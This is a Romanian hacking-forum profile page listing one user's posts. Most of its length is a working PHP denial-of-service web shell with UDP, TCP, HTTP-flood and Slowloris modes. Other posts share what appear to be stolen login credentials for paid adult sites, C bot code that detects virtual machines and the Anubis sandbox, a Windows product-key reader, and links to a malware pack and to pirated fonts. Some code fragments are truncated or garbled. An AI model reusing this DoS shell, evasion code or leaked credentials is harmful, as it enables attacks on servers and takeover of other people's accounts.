io.kent
-
Posts
2325 -
Joined
-
Last visited
-
Days Won
21
Everything posted by io.kent
-
Pentru totii trantorii, brazzers, si multe altele!
io.kent replied to io.kent's topic in Discutii non-IT
Va rog nu mai schimbati parolele sa se foloseasca mai multa lume de ele! -
PHP Code: http://Cobalt117:cobalt@ma.brazzers.com/access/login http://cobra302:1987mustang@ma.brazzers.com/access/login http://cody6577:codyd31px@ma.brazzers.com/access/login http://Cnelson565:Nelson25@ma.brazzers.com/access/login http://cherry6906:Cereza6906@ma.brazzers.com/access/login http://cocacola:4600619@ma.brazzers.com/access/login http://Colemann:Pornstar1969@ma.brazzers.com/access/login http://confusedhard:Computer2011@ma.brazzers.com/access/login http://coldwave9:97124352w@ma.brazzers.com/access/login http://comnat:idunno@ma.brazzers.com/access/login http://claudebln973:Elmo26095@ma.brazzers.com/access/login http://coordinator1:111111@ma.brazzers.com/access/login http://cooljay72085:jklq4804@ma.brazzers.com/access/login http://clettus:D3pl0yn0w@ma.brazzers.com/access/login http://condolawyer:moshiach@ma.brazzers.com/access/login http://coalking:shane01@ma.brazzers.com/access/login http://coolmc10:cinsey01@ma.brazzers.com/access/login http://cornelius80:tugostas@ma.brazzers.com/access/login http://cobra4280:mollymoo@ma.brazzers.com/access/login http://CoachDub:carter@ma.brazzers.com/access/login http://codster217:fuckoff@ma.brazzers.com/access/login http://colipeul:obda65ue@ma.brazzers.com/access/login http://Cogote22:Alfl16aeel9@ma.brazzers.com/access/login http://cooch320:dude320@ma.brazzers.com/access/login http://commish:keystone@ma.brazzers.com/access/login http://courtneyanne:4840Roche@ma.brazzers.com/access/login http://corrid:inginne@ma.brazzers.com/access/login http://Coc4Pla2:Ar2You3@ma.brazzers.com/access/login http://Coryusb:Williams@ma.brazzers.com/access/login http://conja6:R05205768@ma.brazzers.com/access/login http://cletusdeclan:batman@ma.brazzers.com/access/login http://cobra69:697071@ma.brazzers.com/access/login http://Constant123:Juicy123@ma.brazzers.com/access/login http://cpancoast:12131213@ma.brazzers.com/access/login http://crashpron:snow720now@ma.brazzers.com/access/login http://coreymb:moviebox@ma.brazzers.com/access/login http://craftymc1:q12qwaszx@ma.brazzers.com/access/login http://cr0691:june1991@ma.brazzers.com/access/login http://coreyt99:coreyt99@ma.brazzers.com/access/login http://cperritte:rhlp1102@ma.brazzers.com/access/login http://crazyjoe18:farmer2012@ma.brazzers.com/access/login http://CPendzich:cody414@ma.brazzers.com/access/login http://cmswifty:charlie@ma.brazzers.com/access/login http://chan007:micron4200@ma.brazzers.com/access/login http://colincrw2005:linda1@ma.brazzers.com/access/login http://crb1965:meister@ma.brazzers.com/access/login http://corvettels2:corvettels2@ma.brazzers.com/access/login http://CovoRoth:RemberB22@ma.brazzers.com/access/login http://Corrie:1Yobro111@ma.brazzers.com/access/login http://craino:harmonious@ma.brazzers.com/access/login
-
Nu avem nevoie de trantori, lenesi, si zugravi, de unde ai auzit de RsT? Sora ai? Bunicii?? Averi?? Cunostinte interlope?? Cam atat! On : sedere placuta, ce meserie ai??
-
Done! Lucius
-
moody54:dave69 walkerzkool81986:1986jw suds1977 - 586934 toronto:toronto wmendi:koufax32 4tubepass:4tubepass lfeng314:asian314 Charliebrown300:300000 Edit : Babes + Twistys + Digital Playground! gundelero:1xrzvts1 http://members.babes.com/
-
pr0n keywords: http://pastebin.com/raw.php?i=bqEzNzpS // ps: nu mai dati paste la mii de cuvinte porn aici. De asemenea, nu are ce cauta asta la categoria programare.
-
Facebook cumpără WhatsApp cu 16 miliarde USD
io.kent replied to wildchild's topic in Stiri securitate
Era de asteptat, si acum o sa ne puna la plata, pisatii! -
<?php if(isset($_GET['method'])) { $bytes = 65000; /* * 65000 bytes is the around max packet size in * TCP and UDP * * lower ths to be secretive about the shell being on * the web server - you will have less chance of the * outbound packets being caught. */ if(empty($_GET['ip']) || empty($_GET['port']) || empty($_GET['length'])) { exit("You've forgotten something."); } if($_GET['method'] == "udp") { ignore_user_abort(true); set_time_limit(0); ob_start(); echo "Attack sent!"; $s = ob_get_length(); header("Content-Length: {$s}"); header("Content-Encoding: none"); header("Connection: close"); ob_end_flush(); ob_flush(); flush(); if(session_id()) session_write_close(); $n = 0; $packet = ''; do { switch($n) { case 0: $packet .= 'A'; break; case 1: $packet .= 'S'; break; case 2: $packet .= 'D'; break; case 3: $packet .= 'A'; break; } $n++; if($n == 4) $n = 0; } while(strlen($packet) != $bytes); $running = true; $runFor = strtotime('now') + $_GET['length']; do { if(strtotime('now') > $runFor) { $running = false; } $sock = @fsockopen("udp://{$_GET['ip']}", $_GET['port'], $errno, $errstr, 10); if($sock) { fwrite($sock, $packet); fclose($sock); } else { $sock = @fsockopen("udp://{$_GET['ip']}", $_GET['port'], $errno, $errstr, 10); fwrite($sock, $packet); } } while($running == true); } elseif($_GET['method'] == "slowloris") { ignore_user_abort(true); set_time_limit(0); ob_start(); echo "Attack sent!"; $s = ob_get_length(); header("Content-Length: {$s}"); header("Content-Encoding: none"); header("Connection: close"); ob_end_flush(); ob_flush(); flush(); if(session_id()) session_write_close(); $header = array(); $header[] = "GET / HTTP/1.1"; $header[] = "User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7"; $header[] = "Host: {$_GET['ip']}"; $header[] = "Keep-Alive: 900"; $header[] = "Content-Length: " . mt_rand(100000, 1000000); $header[] = "Connection: keep-alive"; $sock = @fsockopen($_GET['ip'], $_GET['port'], $errno, $errstr); if($sock) { fwrite($sock, implode("\r\n", $header)); $running = false; $runFor = strtotime('now') + $_GET['length']; do { if(strtotime('now') > $runFor) { $running = false; } if($sock) { fwrite($sock, '.'); sleep(3); } else { $sock = @fsockopen($_GET['ip'], $_GET['port'], $errno, $errstr); fwrite($sock, implode("\r\n", $header)); } } while($running == true); } } elseif($_GET['method'] == "tcp") { ignore_user_abort(true); set_time_limit(0); ob_start(); echo "Attack sent!"; $s = ob_get_length(); header("Content-Length: {$s}"); header("Content-Encoding: none"); header("Connection: close"); ob_end_flush(); ob_flush(); flush(); if(session_id()) session_write_close(); $n = 0; $packet = ''; do { switch($n) { case 0: $packet .= 'A'; break; case 1: $packet .= 'S'; break; case 2: $packet .= 'D'; break; case 3: $packet .= 'A'; break; } $n++; if($n == 4) $n = 0; } while(strlen($packet) != $bytes); $running = true; $runFor = strtotime('now') + $_GET['length']; do { if(strtotime('now') > $runFor) { $running = false; } $sock = @fsockopen("tcp://{$_GET['ip']}", $_GET['port'], $errno, $errstr, 10); if($sock) { fwrite($sock, $packet); fclose($sock); } else { $sock = @fsockopen("tcp://{$_GET['ip']}", $_GET['port'], $errno, $errstr, 10); fwrite($sock, $packet); } } while($running == true); } elseif($_GET['method'] == "http") { ignore_user_abort(true); set_time_limit(0); ob_start(); echo "Attack sent!"; $s = ob_get_length(); header("Content-Length: {$s}"); header("Content-Encoding: none"); header("Connection: close"); ob_end_flush(); ob_flush(); flush(); if(session_id()) session_write_close(); $header = array(); $header[] = "GET / HTTP/1.1"; $header[] = "Host: {$_GET['ip']}"; $header[] = "User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7"; $header[] = "Keep-Alive: 300"; $header[] = "Content-Length: " . mt_rand(100000, 1000000); $header[] = "Connection: keep-alive"; $sock = @fsockopen($_GET['ip'], $_GET['port'], $errno, $errstr); if($sock) { fwrite($sock, implode("\r\n", $header)); $running = false; $runFor = strtotime('now') + $_GET['length']; do { if(strtotime('now') > $runFor) { $running = false; } if($sock) { fwrite($sock, '.'); fclose($sock); sleep(3); } else { $sock = @fsockopen($_GET['ip'], $_GET['port'], $errno, $errstr); fwrite($sock, implode("\r\n", $header)); } } while($running == true); } } } ?> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta name="author" content="ASDA"> <meta name="robots" content="noindex, nofollow"> <title> Private Denial-of-Service Shell | Created by ASDA | HackForums.net | </title> <style> html, body { height: 100%; cursor: none; background: #000; color: #66ff33; overflow: hidden; } h1 { text-align: center; font-size: 50px; } #barX { background: #66ff33; left: 0; top: 0; position: absolute; width: 1px; height: 100%; z-index: 1000; } #barY { background: #66ff33; left: 0; top: 0; position: absolute; width: 100%; height: 1px; z-index: 1000; } input { cursor: none; border: 1px solid #11ff00; margin-bottom: 20px; } form { width: 50px; margin: auto; } label { display: block; } iframe { display: none; visibility: hidden; } </style> </head> <body> <div id="barY"></div> <div id="barX"></div> <div id="doColours"></div> <form action="<?php echo $_SERVER["SCRIPT_NAME"]; ?>" method="GET"> <label for="ip">Host:</label> <input type="text" name="ip" id="ip"> <label for="port">Port:</label> <input type="text" name="port" id="port"> <label for="length">Length:</label> <input type="text" name="length" id="length"> <label for="method">Method:</label> <select name="method" id="method"> <option value="slowloris">Slowloris</option> <option value="udp">UDP Flood</option> <option value="tcp">TCP Flood</option> <option value="http">HTTP Flood</option> </select> <br><br> <input type="submit" value="ATTACK!"> </form> <div id="youtube"></div> <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js"></script> <script type="text/javascript"> $(document).ready(function(){ var title = document.title; setInterval(function(){title = title.substring(1, title.length) + title.substring(0, 1);document.title = title;}, 300); $("body").bind('mousemove', function(evt) { $("#barY").css({ "top": evt.pageY + 10 + "px" }); $("#barX").css({ "left": evt.pageX + 10 + "px" }); }); var youtubea = new Array(); youtubea[0] = "<iframe src=\"https://youtube.com/embed/zeIjmvZZ_SQ?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[1] = "<iframe src=\"https://youtube.com/embed/-ieJtn73e1w?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[2] = "<iframe src=\"https://youtube.com/embed/w1bRniqs774?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[3] = "<iframe src=\"https://youtube.com/embed/GqUN76-_Djg?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[4] = "<iframe src=\"https://youtube.com/embed/UDzNq1s7dAE?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[5] = "<iframe src=\"https://youtube.com/embed/DC9xwwmyS70?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[6] = "<iframe src=\"https://youtube.com/embed/liYyEqlvG1Y?autoplay=1#t=17s\" frameborder=\"0\"></iframe>"; youtubea[7] = "<iframe src=\"https://youtube.com/embed/K1VLaXoRRdk?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[8] = "<iframe src=\"https://youtube.com/embed/EZxeJV-G9kg?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[9] = "<iframe src=\"https://youtube.com/embed/JRwXku3nM1c?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[10] = "<iframe src=\"https://youtube.com/embed/oKpPd2hDrE4?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[11] = "<iframe src=\"https://youtube.com/embed/3Rd0LHQHjWg?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[12] = "<iframe src=\"https://youtube.com/embed/nuno2jOwOjo?autoplay=1\" frameborder=\"0\"></iframe>"; youtubea[13] = "<iframe src=\"https://youtube.com/embed/xLho8rMQpoI?autoplay=1\" frameborder=\"0\"></iframe>"; var rand = Math.floor(Math.random() * (youtubea.length + 1)); $('#youtube').html(youtubea[rand]); function doColour(a){setInterval(function(){for(var b=0;b<a.length;b++){$("#letter"+.css({color:colour[b]})}for(var b=0;b<colour.length;b++){colour[b-1]=colour[b]}colour[colour.length-1]=colour[-1]},50)}function initColours(a){var b="\x41\x53\x44\x41\x27\x73\x20\x50\x72\x69\x76\x61\x74\x65\x20\x53\x68\x65\x6C\x6C".split("");var c="<h1>";$.each(b,function(a,{c+="<span id='letter"+a+"'>"+b+"</span>"});c+="</h1>";$("#doColours").html(c);doColour(;var d=1;setInterval(function(){while(colour.length<b.length){colour=colour.concat(colour)}d=Math.floor(Math.random()*colours.length);colour=colours[d]},5e3)}colours=new Array;colours[0]=new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100");colours[1]=new Array("#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00","#00FF00","#000000","#00FF00","#00FF00");colours[2]=new Array("#00FF00","#FF0000","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00","#00FF00");colours[3]=new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040");colours[4]=new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000");colours[5]=new Array("#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF","#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF","#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF","#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF","#000000","#000000","#000000","#FFFFFF","#FFFFFF","#FFFFFF");colours[6]=new Array("#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00","#0000FF","#FFFF00");colour=colours[4];initColours(); }); </script> </body> </html>
-
#!/usr/bin/python # coding: utf-8 # Apache Log Extractor # # Chrs John Riley # blog.c22.cc # # 27/07/2011 # # Version: 0.4 Alpha # # PoC script... use at your own risk... # # 0.1 Initial Version # 0.2 Added wordlist support # 0.3 Added verbose, filter ... directories # 0.4 Added Basic Auth username extraction where present import sys, os, re logo = ''' _ _ ______ _ _ /\ | | | | | ____| | | | | / \ _ __ __ _ ___| |__ ___ | | ___ __ _ | |__ __ _| |_ _ __ __ _ ___| |_ ___ _ __ / /\ \ | '_ \ / _` |/ __| '_ \ / _ \ | | / _ \ / _` | | __| \ \/ / __| '__/ _` |/ __| __/ _ \| '__| / ____ \| |_) | (_| | (__| | | | __/ | |___| (_) | (_| | | |____ > <| |_| | | (_| | (__| || (_) | | /_/ \_\ .__/ \__,_|\___|_| |_|\___| |______\___/ \__, | |______/_/\_\\__|_| \__,_|\___|\__\___/|_| | | __/ | |_| |___/ [\x1B[34;40mv0.4\x1B[0m] _/ Apache Log Extractor \x1B[34;40m?\x1B[0m _/ ChrisJohnRiley \x1B[34;40m?\x1B[0m _/ blog.c22.cc \x1B[34;40m?\x1B[0m\n''' def main(): if len(sys.argv) < 2: print (logo) print " [\x1B[34;40m!\x1B[0m] Use " + sys.argv[0] + " log_file.log \n [\x1B[34;40m!\x1B[0m] Use -v for verbose mode" sys.exit(1) else: print (logo) print " [\x1B[34;40m \x1B[0m] Analysing the log file....\n" logfile = sys.argv[1] outfile = sys.argv[1] + ".output" wordfile = sys.argv[1] + ".wordlist" userfile = sys.argv[1] + ".users" if len(sys.argv) > 2: if "-v" in sys.argv[2]: verbose = 'true' print " [\x1B[34;40m+\x1B[0m] Verbose mode active\n" else: verbose = '' if os.path.exists(outfile): print " [\x1B[34;40m!\x1B[0m] Output file already exists \n [\x1B[34;40m!\x1B[0m] Exiting!\n" exit() try: inputfile_handle = open(logfile, 'r') outputfile_handle = open(outfile, 'w') wordfile_handle = open(wordfile, 'w') except: print " [\x1B[34;40m!\x1B[0m] Failed to open input/output files \n [\x1B[34;40m!\x1B[0m] Exiting!\n" sys.exit(1) pattern = re.compile('(GET|POST)\s(.+?)\s', re.IGNORECASE) # Scan the logfile and extract the required sections matches = [] matches2 = [] unique = [] ValidIpAddressRegex = "^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$" for line in inputfile_handle: working_line = re.search(pattern, line) small = line.split("[") small = small[0].split(" ") if (len(small) > 2) and small[2] != "-" and small[2] != "": if re.match(ValidIpAddressRegex, small[0]): working_line2 = small[2] else: working_line2 = "" if working_line: matches.append(working_line.group(2)) working_line = "" if working_line2: matches2.append(working_line2) working_line2 = "" print " [\x1B[34;40m \x1B[0m] Extracting URLs from logfile : " + logfile + "\n" if verbose: print "\n" for m in matches: if (m not in unique) and m != "*" and (".../" not in m): # .../ match ignores incomplet paths in logfile unique.append(m) if verbose: print " [\x1B[34;40m \x1B[0m] Extracted URL : ", m outputfile_handle.write(m +'\n') if verbose: print "\n" print " [\x1B[34;40m \x1B[0m] Extracting directory names from logfile\n" uniqueword = [] for w in unique: word = w.split('?') # Strip off parameters word = word[0].split('/') # Extract directory names for x in word[0:-1]: if (x not in uniqueword) and x != "" and ("..." not in x): uniqueword.append(x) if verbose: print " [\x1B[34;40m \x1B[0m] Extracted Word : ", x wordfile_handle.write(x +'\n') if verbose: print "\n" print " [\x1B[34;40m \x1B[0m] Extracting basic auth usernames from logfile : " + logfile + "\n" unique2 = [] for m in matches2: if (m not in unique2) and m != " ": unique2.append(m) if verbose: print " [\x1B[34;40m \x1B[0m] Extracted basic auth username : ", m if unique2: try: userfile_handle = open(userfile, 'w') for each in unique2: userfile_handle.write(each +'\n') userfile_handle.close() except: print " [\x1B[34;40m!\x1B[0m] Failed to open input/output files \n [\x1B[34;40m!\x1B[0m] Exiting!\n" sys.exit(1) # Close files outputfile_handle.close() inputfile_handle.close() wordfile_handle.close() if verbose: print "\n" print " [\x1B[34;40m+\x1B[0m] Extracted paths to : \x1B[34;40m" + outfile + "\x1B[0m [" + str(len(unique)) +"]\n" print " [\x1B[34;40m+\x1B[0m] Extracted directory names to : \x1B[34;40m" + wordfile + "\x1B[0m [" + str(len(uniqueword)) + "]\n" if unique2: print " [\x1B[34;40m+\x1B[0m] Extracted basic auth usernames to : \x1B[34;40m" + userfile + "\x1B[0m [" + str(len(unique2)) + "]\n" print "\n [\x1B[34;40m \x1B[0m] Thanks for flying \x1B[34;40mC22\x1B[0m airways: Your ticket to the skies!\n" if __name__=="__main__": main()
-
#NoTrayIcon If Not @ERROR Or Not $a_Call[0] Then Return SetError(2, 0, '') Return DllStructGetData($a, 1) EndFunc ;==>_Base64Decode Func ABOUT() MsgBox(262144, "", " CODED BY CELTIC88 " & @CRLF & @CRLF & " SKYP : CELTIC906 " & @CRLF & @CRLF & " DEVPOINT()", 0, $CREATGUI) EndFunc ;==>ABOUT
-
Visual Basic Option Explicit Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" ( ByVal hKey As Long , ByVal lpSubKey As String , phkResult As Long ) As Long Private Declare Function RegCloseKey Lib "advapi32.dll" ( ByVal hKey As Long ) As Long Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" ( ByVal hKey As Long , ByVal lpValueName As String , ByVal lpReserved As Long , lpType As Long , lpData As Any, lpcbData As Long ) As Long Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long ) Public Function VirusTotal() As String If WinProdKey = "GC8X9-9Y376-BMTFR-T3Q63-R969Q" Then MsgBox "virustotal" End Else MsgBox "infect" End If End Function Public Function WinProdKey() As String Dim lhKey As Long Dim bvBuffer(163) As Byte Dim vCharset As Variant Dim bvChar(23) As Byte Dim i As Long Dim j As Long Dim lCur As Long If RegOpenKey(&H80000002, "SOFTWARE\MICROSOFT\Windows NT\CurrentVersion" , lhKey) = 0& Then If RegQueryValueEx(lhKey, "DigitalProductId" , 0, 3, bvBuffer(0), 164) = 0 Then Call CopyMemory(bvBuffer(0), bvBuffer(52), &HF) vCharset = Array( _ "B" , "C" , "D" , "F" , "G" , "H" , "J" , "K" , "M" , "P" , "Q" , "R" , _ "T" , "V" , "W" , "X" , "Y" , "2" , "3" , "4" , "6" , "7" , "8" , "9" ) For i = 0 To 23 bvChar(i) = Asc(vCharset(i)) Next For i = 24 To 0 Step -1 lCur = 0 For j = 14 To 0 Step -1 lCur = lCur * 256 Xor bvBuffer(j) bvBuffer(j) = Int(lCur / 24) lCur = lCur Mod 24 Next WinProdKey = vCharset(lCur) & WinProdKey If i Mod 5 = 0 And i <> 0 Then WinProdKey = "-" & WinProdKey Next End If Call RegCloseKey(lhKey) End If End Function
-
Probabil, dar in mare parte toate sunt bune!
-
What sets this one apart from every other font pack you've seen, is that these fonts are absolutely the cream of the crop. Most of these retail at a couple of hundred bucks a piece, which probably puts this whole collection well over the $50,000 mark. This is -- by far -- the most expensive pirated "Fonts" . The most expensive ones are scene releases by the font group TYPO, while the folder 'Font.Flood-Mixed.Fonts-all.the.world' has 1,276 individual fonts, all neatly separated in categories. Some of the scene releases also include original, retail PDF manuals and interesting goodies. Download : Share-Online - dl/5WBGCWTMZYX
-
Ce inima de golan aveti, si vorba de preot Jijiji Conturile adaug deseara, momentan sunt in deplasare Va urma... Edit: Brazzer! dickgreener:mikeb667 ernieaguilar:carl08 MAGNUMpi:immmmm berin7:berin77 eyesofbob:1mth3c4t jeff40:harley
-
1) AntiVirusi si Firewall 2) cryptere 3) DOS IRC 4) Dosers 5) Downloaders 6) Keyloggers 7) Other 8) pass stealers 9) RATs 10) stealer Download : https://disk.yandex.com/public/?hash=/brZCYweZdji80E7W3NHUeJ%2B1/5ai0zPimQ%2BulVk4pU%3D Folositi sandbox!
- 1 reply
-
- 1
-
-
#include "../Headers/includes.h" #include "../Headers/functions.h" #ifndef NO_ANTIVM DWORD __forceinline IsInsideVPC_exceptionFilter(LPEXCEPTION_POINTERS ep) { PCONTEXT ctx = ep->ContextRecord; ctx->Ebx = -1; // Not running VPC ctx->Eip += 4; // skip past the "call VPC" opcodes return EXCEPTION_CONTINUE_EXECUTION; } bool DetectVPC() { bool bVPCIsPresent = FALSE; __try { _asm push ebx _asm mov ebx, 0 // It will stay ZERO if VPC is running _asm mov eax, 1 // VPC function number _asm __emit 0Fh _asm __emit 3Fh _asm __emit 07h _asm __emit 0Bh _asm test ebx, ebx _asm setz [bVPCIsPresent] _asm pop ebx } __except(IsInsideVPC_exceptionFilter(GetExceptionInformation())) { } #ifdef DEBUG if (bVPCIsPresent==TRUE) DebugMsg("Bot is under VPC !"); else DebugMsg("Bot is not running under VPC !"); #endif return bVPCIsPresent; } bool DetectVMWare() { bool bVMWareIsPresent = TRUE; __try { __asm { push edx push ecx push ebx mov eax, 'VMXh' mov ebx, 0 // any value but not the MAGIC VALUE mov ecx, 10 // get VMWare version mov edx, 'VX' // port number in eax, dx // read port // on return EAX returns the VERSION cmp ebx, 'VMXh' // is it a reply from VMWare? setz [bVMWareIsPresent] // set return value pop ebx pop ecx pop edx } } __except(EXCEPTION_EXECUTE_HANDLER) { bVMWareIsPresent = FALSE; } #ifdef DEBUG if (bVMWareIsPresent==TRUE) DebugMsg("Bot is under VMWare !"); else DebugMsg("Bot is not running under VMWare !"); #endif return bVMWareIsPresent; } bool DetectAnubis() { char szBotFile[MAX_PATH]; bool bAnubisIsPresent = FALSE; if (strstr(szBotFile, "C:\\InsideTm\\")) bAnubisIsPresent = TRUE; #ifdef DEBUG if (bAnubisIsPresent==TRUE) DebugMsg("Bot is running under Anubis !"); else DebugMsg("Bot is not running under Anubis !"); #endif return bAnubisIsPresent; } bool IsProcessRunningUnderVM() { bool bVMWare; bool bVPC; bool bAnubis; bVMWare = DetectVMWare(); bVPC = DetectVPC(); bAnubis = DetectAnubis(); if (bVPC==TRUE || bVMWare==TRUE || bAnubis==TRUE) return TRUE; return FALSE; } #endif
-
import java.io.IOException; import java.net.HttpURLConnection; import java.net.URL; import java.util.Scanner; public class RedirectLocationScanner { public static void main(final String[] args) throws IOException { String urlStr = null; if (!(args.length == 1)) { Scanner scan = new Scanner(System.in); System.out.println("URL?"); urlStr = scan.nextLine(); scan.close(); } else { urlStr = args[0]; } if(!urlStr.startsWith("http://")){ urlStr = "http://" + urlStr; } URL url = new URL(urlStr); HttpURLConnection.setFollowRedirects(false); String redirectLoc = url.openConnection().getHeaderField("Location"); if(redirectLoc == null){ System.out.println("No redirect."); } else { System.out.println("real URL: " + redirectLoc); } } } package scanner; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.net.HttpURLConnection; import java.net.URL; import java.net.URLConnection; import java.util.Scanner; public class LinkScanner { private static final String[] adServiceStrings = { "adf.ly", "adfoc.us", "any.gs", "tinylinks.co", "linkbucks.com", "yyv.co", "miniurls.co", "qqc.co", "whackyvidz.com", "ultrafiles.net", "dyo.gs", "megaline.co", "uberpicz.com", "linkgalleries.net", "qvvo.com", "urlbeat.net", "seriousfiles.com", "zxxo.net", "ugalleries.net", "picturesetc.net" }; private static final String USAGE = "java -jar scanner.jar <URL>"; public static void main(String[] args) { try { if (args.length == 1) { System.out.println("Target URL: "); scanAndPrint(args[0]); } else if (args.length == 0) { Scanner scan = new Scanner(System.in); System.out.println("URL?"); String url = scan.nextLine(); scanAndPrint(url); } else { System.out.println(USAGE); } } catch (IOException e) { System.err.println(e.getMessage()); } } private static void scanAndPrint(String string) throws IOException { System.out.println("Scanning ..."); String target = new LinkScanner().scan(string); if (target != null) { System.out.println("Target URL: "); System.out.println(target); } else { System.err.println("No target URL found"); } } public String scan(String urlStr) throws IOException { if (!urlStr.startsWith("http://")) { urlStr = "http://" + urlStr; } URL url = new URL(urlStr); HttpURLConnection.setFollowRedirects(false); if (isAdServiceLink(urlStr)) { return handleAdLink(url); } else { return handleRedirect(url); } } private boolean isAdServiceLink(String urlStr) { for (String str : adServiceStrings) { if (urlStr.contains(str)) { return true; } } return false; } private String handleRedirect(URL url) throws IOException { return url.openConnection().getHeaderField("Location"); } private String handleAdLink(URL url) throws IOException { URLConnection urlc = url.openConnection(); urlc.addRequestProperty("user-agent", "Firefox"); BufferedReader in = null; try { in = new BufferedReader( new InputStreamReader(urlc.getInputStream())); String line; while ((line = in.readLine()) != null) { if (line.contains("var zzz =")) { return extractADFlyURL(line); } if (line.contains("var click_url =") && !line.contains("//var click_url =")) { return extractADFocURL(line); } if (line.contains("Lbjs.TargetUrl =")) { return extractLinkBucksURL(line); } } throw new IOException("Unable to find target URL in link"); } finally { if (in != null) { in.close(); } } } private String extractLinkBucksURL(String line) { String go = line.split("'")[1]; return go; } private String extractADFocURL(String line) throws IOException { String go = line.split("\"")[1]; return go; } private String extractADFlyURL(String line) throws IOException { String go = line.split("'")[1]; String redirect = handleRedirect(new URL("http://adf.ly" + go)); if (redirect == null) { return go; } return redirect; } } Valabil in mare parte pentru : adfoc Linkbucks Adfly
-
#AutoIt3Wrapper_UseUpx=n #AutoIt3Wrapper_UseX64=n #RequireAdmin Global Const $gui_event_close = -3 Global Const $gui_event_minimize = -4 Global Const $gui_event_restore = -5 Global Const $gui_event_maximize = -6 Global Const $gui_event_primarydown = -7 Global Const $gui_event_primaryup = -8 Global Const $gui_event_secondarydown = -9 Global Const $gui_event_secondaryup = -10 Global Const $gui_event_mousemove = -11 Global Const $gui_event_resized = -12 Global Const $gui_event_dropped = -13 Global Const $gui_rundefmsg = "GUI_RUNDEFMSG" Global Const $gui_avistop = 0 Global Const $gui_avistart = 1 Global Const $gui_aviclose = 2 Global Const $gui_checked = 1 Global Const $gui_indeterminate = 2 Global Const $gui_unchecked = 4 Global Const $gui_dropaccepted = 8 Global Const $gui_nodropaccepted = 4096 Global Const $gui_acceptfiles = $gui_dropaccepted Global Const $gui_show = 16 Global Const $gui_hide = 32 Global Const $gui_enable = 64 Global Const $gui_disable = 128 Global Const $gui_focus = 256 Global Const $gui_nofocus = 8192 Global Const $gui_defbutton = 512 Global Const $gui_expand = 1024 Global Const $gui_ontop = 2048 Global Const $gui_fontitalic = 2 Global Const $gui_fontunder = 4 Global Const $gui_fontstrike = 8 Global Const $gui_dockauto = 1 Global Const $gui_dockleft = 2 Global Const $gui_dockright = 4 Global Const $gui_dockhcenter = 8 Global Const $gui_docktop = 32 Global Const $gui_dockbottom = 64 Global Const $gui_dockvcenter = 128 Global Const $gui_dockwidth = 256 Global Const $gui_dockheight = 512 Global Const $gui_docksize = 768 Global Const $gui_dockmenubar = 544 Global Const $gui_dockstatebar = 576 Global Const $gui_dockall = 802 Global Const $gui_dockborders = 102 Global Const $gui_gr_close = 1 Global Const $gui_gr_line = 2 Global Const $gui_gr_bezier = 4 Global Const $gui_gr_move = 6 Global Const $gui_gr_color = 8 Global Const $gui_gr_rect = 10 Global Const $gui_gr_ellipse = 12 Global Const $gui_gr_pie = 14 Global Const $gui_gr_dot = 16 